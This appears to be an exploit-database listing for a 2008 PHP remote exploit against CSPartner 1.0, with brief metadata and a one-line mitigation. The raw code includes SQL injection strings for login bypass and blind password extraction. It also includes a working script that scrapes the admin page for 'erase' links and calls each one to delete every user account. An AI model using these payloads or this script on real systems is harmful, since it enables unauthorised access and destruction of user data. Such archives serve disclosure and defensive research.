CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit

vendor:

CSPartner

by:

StAkeR

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: CSPartner

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: a:cspartner:cspartner:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit

This exploit is related to the CSPartner 1.0 software. It is a remote exploit that allows an attacker to delete all users from the system by exploiting a SQL injection vulnerability in the 'gestion.php' file. The exploit works by sending a malicious request to the 'erase' parameter in the 'index.php' file. The attacker can then use the 'or' operator to bypass the authentication and delete all users from the system.

Mitigation:

The best way to mitigate this vulnerability is to update the software to the latest version and ensure that all security patches are applied.

Source

Exploit-DB raw data:

<?php

/*

   CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit
   ----------------------------------------------------------------
   By StAkeR[at]hotmail[dot]it 
   http://www.easy-script.com/scripts-dl/cspartne-01.zip
   ----------------------------------------------------------------
   
   File gestion.php
   
   5. if(!empty($_POST["pseudo"]) && !empty($_POST["passe"])){
   6. $sql  = "SELECT * FROM $tblPartner where pseudo='".$_POST["pseudo"]."' AND password='".$_POST["passe"]."'";
   7. $resultat = mysql_db_query($mydbPartner, $sql);
   
   Blind SQL Injection or Login ByPass for you :P
   
   Examples: ($_POST['pseudo'] and $_POST['passe'])
   
  -1 ' or '1=1
  -2 ' or ascii(substring((select password from CSPartner where id=1),1,1))=[97]/*
  -3 and other :D
  
   
   
*/


error_reporting(0);

$host = $argv[1] or die("Usage: php [exploit.php] [http://localhost/cms]\n");

if(preg_match_all('/erase=(.+?)"/',file_get_contents($host.'/admin/index.php'),$out))
{
  for($i=0;$i<=count($out);$i++)
  {
    file_get_contents($host.'/admin/index.php?erase='.$out[1][$i]);
  }
    echo "[-] All Users Deleted\n";
}
else
{
  echo "[-] Exploit Failed!\n";
}

# milw0rm.com [2008-10-23]